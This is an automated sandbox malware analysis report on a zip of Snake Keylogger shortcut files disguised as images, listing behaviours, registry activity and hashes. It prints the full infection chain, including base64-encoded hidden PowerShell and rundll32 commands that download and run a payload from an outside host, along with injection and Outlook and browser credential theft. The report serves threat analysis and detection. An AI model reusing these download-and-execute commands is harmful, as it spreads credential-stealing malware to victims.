Malware Analysis Report

2025-06-16 03:51

Sample ID 240131-j4v9aagab2
Target MedExpo_Images.zip
SHA256 e17379b6d33d27a7f34ca65076488e87d70d9a9754c6c555becb8c58a23dac81
Tags snakekeylogger collection keylogger spyware stealer
Score 10/10

Analysis Overview

Score 10/10

SHA256 e17379b6d33d27a7f34ca65076488e87d70d9a9754c6c555becb8c58a23dac81

Threat Level: Known bad

The file MedExpo_Images.zip was found to be: Known bad.

Malicious Activity Summary

snakekeylogger collection keylogger spyware stealer

Snake Keylogger payload

Snake Keylogger

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Modifies registry class

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-01-31 08:13

Signatures

N/A

Analysis: behavioral5

Detonation Overview

Submitted 2024-01-31 08:13
Reported 2024-01-31 08:16
Platform win7-20231215-en
Max time kernel 122s
Max time network 125s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

Network

N/A

Files

Analysis: behavioral6

Detonation Overview

Submitted 2024-01-31 08:13
Reported 2024-01-31 08:16
Platform win10v2004-20231215-en
Max time kernel 142s
Max time network 154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4064 set thread context of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\system32\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\MuiCache C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 4172 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4172 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 448 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 4184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 4404 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2156 wrote to memory of 5080 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4404 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1424 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 1424 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1424 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4404 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 820 wrote to memory of 4064 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe
PID 4064 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "

C:\Windows\system32\DeviceCredentialDeployment.exe

DEVIcECRedentIALdEPLOymEnt

C:\Windows\system32\rundll32.exe

RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

C:\Windows\system32\rundll32.exe

rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe

C:\Windows\system32\DeviceCredentialDeployment.exe

dEvicEcredeNTiAldEPlOYMeNT

C:\Windows\system32\timeout.exe

timEout /T 7 /nObREAK

C:\Windows\system32\taskkill.exe

TAskkilL.Exe /F /Im rUNdlL32.exE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B

C:\Windows\system32\conhost.exe

CoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_syecztnn.ftz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat

MD5 885e4bf9c36d1964f751bca33e898503
SHA1 4055100dda8ee3845cfda6735900c556d8c19ca1
SHA256 5efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA512 5da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3

C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

MD5 39aceb0c8a015a4e8f66498e03ff16db
SHA1 4707695dece3a70bfbe55868d059a22e4325eaf0
SHA256 7eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA512 0cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J6M39GIU\jertrs[1].exe

MD5 b07832ec5f73ae5f2888ebab2aa5283a
SHA1 cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256 dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA512 7a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15

Analysis: behavioral1

Detonation Overview

Submitted 2024-01-31 08:13
Reported 2024-01-31 08:16
Platform win7-20231215-en
Max time kernel 120s
Max time network 120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted 2024-01-31 08:13
Reported 2024-01-31 08:16
Platform win10v2004-20231222-en
Max time kernel 143s
Max time network 151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4128 set thread context of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\system32\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\MuiCache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
